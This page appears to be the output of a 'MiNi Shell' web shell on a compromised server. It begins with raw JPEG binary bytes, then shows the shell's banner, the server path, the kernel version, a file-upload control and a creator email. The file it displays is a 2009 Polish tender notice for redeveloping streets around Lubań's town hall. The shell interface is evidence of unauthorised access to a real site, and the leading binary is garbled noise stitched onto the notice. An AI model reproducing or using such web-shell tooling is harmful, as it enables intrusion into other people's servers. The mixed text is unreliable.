JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090819/136697-N-2009.html

<p class="kh_header"><b>Lubań: ZAGOSPODAROWANIE TERENU POMIĘDZY ULICAMI: RYNEK - BRACKA - WĄSKA - SPÓŁDZIELCZA W LUBANIU (PRZY RATUSZU)</b><br>
<b>Numer ogłoszenia: 136697 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Lubań , ul. 7 Dywizji 14, 59-800 Lubań, woj. dolnośląskie, tel. 075 6464400, faks 075 6464405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.luban.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAGOSPODAROWANIE TERENU POMIĘDZY ULICAMI: RYNEK - BRACKA - WĄSKA - SPÓŁDZIELCZA W LUBANIU (PRZY RATUSZU).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAGOSPODAROWANIE TERENU POMIĘDZY ULICAMI:  RYNEK - BRACKA - WĄSKA - SPÓŁDZIELCZA W LUBANIU (PRZY RATUSZU) 
Szczegółowy zakres robót obejmuje:
a) Roboty rozbiórkowe:
mechaniczna rozbiórka nawierzchni bitumicznej jezdni wraz z wywozem gruzu z rozbiórki; mechaniczna rozbiórka podbudowy jezdni z kruszywa kamiennego wraz z wywozem materiału z rozbiórki; mechaniczna rozbiórka nawierzchni z brukowca z przeznaczeniem materiału z rozbiórki do ponownego wbudowania; mechaniczna rozbiórka nawierzchni chodnika z betonowej kostki brukowej z przeznaczeniem materiału z rozbiórki do ponownego wbudowania; ręczna rozbiórka nawierzchni bitumicznej, z płyt betonowych, płyt kamiennych oraz betonowej kostki brukowej placu i chodników wraz z wywozem gruzu z rozbiórki (za wyjątkiem kostki betonowej); rozbiórka krawężników betonowych 20x30 cm wraz z ławami betonowymi z wywozem gruzu z rozbiórki; rozbiórka obrzeży betonowych 8x30 cm wraz z wywozem gruzu z rozbiórki; rozbiórka cokołów i słupków pod ławki z cegły klinkierowej wraz z fundamentami betonowymi wraz z wywozem gruzu z rozbiórki.
b) Roboty ziemne:
roboty pomiarowe przy powierzchniowych robotach ziemnych; roboty ziemne zmechanizowane z wywozem urobku związane z wykonaniem koryta pod konstrukcje nawierzchni jezdni, placów, chodników i zieleni; mechaniczne plantowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni.
c) Remont i uzupełnienie elementów odwodnienia jezdni i przyległych posesji:
roboty ziemne związane z odkryciem istniejącej sieci kanalizacji deszczowej i jej przyłączy oraz wykopy pod nowe odcinki sieci, przykazały, studnie rewizyjne i studzienki ściekowe i rury spustowe; demontaż istniejącej zniszczonej sieci kanalizacji deszczowej, sieć  z rur betonowych o średnicy 200 mm; wykonanie kanału deszczowego z rur PVC o średnicy 200 mm oraz przykanałów studzienek ściekowych i rur spustowych z rur PVC o średnicy 200 mm z wykonaniem podsypek i osypek wykonanej sieci; wykonanie studni rewizyjnych z kręgów betonowych, systemowych PVC, studzienek ściekowych z osadnikiem z elementów betonowych o średnicy 500 mm wraz z montażem wpustu żeliwnego uchylnego oraz żeliwnych rur spustowych wraz z czyszczakiem na budynku; zasypanie i zagęszczenie wykopów oraz wywóz nadmiaru gruntu.
d) Warstwy odcinające i podbudowy kamienne:
warstwa odcinająca z piasku pod nawierzchnię jezdni grub. 15 cm; warstwa podsypkowa cementowo-piaskowa pod nawierzchnię placu grub. 5 cm; podbudowa z piasku gruboziarnistego pod nawierzchnię chodnika grub. 8 cm; podbudowa z mieszanki kamiennej pod jezdnię i place, warstwa dolna grub. 15 cm, warstwa górna grub. 8 cm; podbudowa z mieszanki kamiennej pod chodniki warstwa górna grub. 8 cm.
e) Obramowanie jezdni i chodników oraz ściek uliczny:
krawężniki betonowe 15x30 cm na ławie betonowej z oporem; obrzeża betonowe 8x30 cm na ławie betonowej zwykłej; ściek uliczny na ławie betonowej z kostki kamiennej rzędowej 18/18 oraz 2 rzędów kostki kamiennej nieregularnej o wys. 10 cm.  
f) Regulacja urządzeń obcych:
regulacja do poziomu nawierzchni studzienek włazów kanałowych, studzienek kratek ściekowych, zaworów wodociągowych i gazowych oraz studni telekomunikacyjnych.
g) Nawierzchnie jezdni, placu i chodników:
nawierzchnia jezdni z kostki kamiennej nieregularnej wysokości 10 cm na podsypce cementowo-piaskowej; nawierzchnia jezdni z masy mineralno - asfaltowej grub. 4 cm po zagęszczeniu; nawierzchnia placów z kostki betonowej typu staromiejskiego grub. 8 cm; nawierzchnie chodników z kostki kamiennej nieregularnej wysokości 4/6 cm na podsypce cementowo-piaskowej; nawierzchnie chodników z betonowej kostki brukowe grub. 8 cm.
h) Schody:
wykonanie schodów z krawężnika betonowego i  obrzeży betonowych na ławach betonowych oraz kostki betonowej na podsypce cementowo-piaskowej; montaż poręczy rurowych przy schodach wraz z ich pomalowaniem.
i) Urządzenie zieleni, mała architektura oraz roboty towarzyszące:
wykonanie cokołów z cegły klinkierowej na ławie betonowej stanowiących obramowanie terenów zieleni; rozścielenie ziemi urodzajnej wraz z darniowaniem w ramach odtworzenia istniejących terenów zieleni zajętych pod roboty instalacyjne; dostawa i montaż ławek typu staromiejskiego, koszy na śmieci oraz stojaków dla rowerów; odbudowa cokołów wsypów piwnicznych cegłą klinkierową wraz z montażem rusztów metalowych ozdobnych jako przykrycia wsypów.
j) Inne:
sporządzenie projektu organizacji ruchu zastępczego na czas wykonywania robót wraz z zatwierdzeniem przez zarządcę ruchu na drogach gminnych i wprowadzeniem tego oznakowania na placu budowy; Nadzór archeologiczny nad prowadzonymi pracami w strefie ochrony zabytków.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.23.32.52-0, 45.11.00.00-1, 45.23.13.00-8, 45.11.27.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta winna być zabezpieczona wadium w wysokości: 12.000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1) posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz nie podlegać wykluczeniu na podstawie art. 24 u.p.z.p. 
2) posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców 
o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie): wykonać  w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 roboty budowlane, których przedmiotem było wykonanie robót odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. 
3) Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia.
4) Udzielić gwarancji na wykonane roboty (materiały i robociznę) na okres minimum 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania protokołu końcowego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunku 1 Wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
W celu potwierdzenia spełniania 2 warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych W przypadku składania oferty wspólnej wykonawcy składają jeden wspólny wykaz. 
Zamawiający uzna, że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli wykaże, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają doświadczenie oraz wymagane uprawnienia w specjalności konstrukcyjnej w zakresie budowy dróg oraz instalacyjnej  w zakresie instalacji sanitarnych. 
	Wykonawca przedłoży wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także danymi na temat zakresu wykonywanych przez nich czynności lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował. Oferent przedłoży dokumenty potwierdzające, że osoba, która będzie pełniła funkcję kierownika robót posiada wymagane uprawnienia i jest zrzeszony w Okręgowej Izbie Inżynierów Budownictwa.
Dla spełnienia warunku określonego w pkt 3 Wykonawca złoży stosowne oświadczenie
Dla spełnienia warunku określonego w pkt 4 Wykonawca wskaże okres obowiązywania gwarancji w formularzu ofertowym..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-luban.dolnyslask.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Techniczno-Inwestycyjny Urzędu Miasta Lubań, Plac Lompy 1, 59-800 Lubań.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.09.2009 godzina 11:00, miejsce: Wydział Techniczno-Inwestycyjny Urzędu Miasta Lubań, Plac Lompy 1, 59-800 Lubań.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com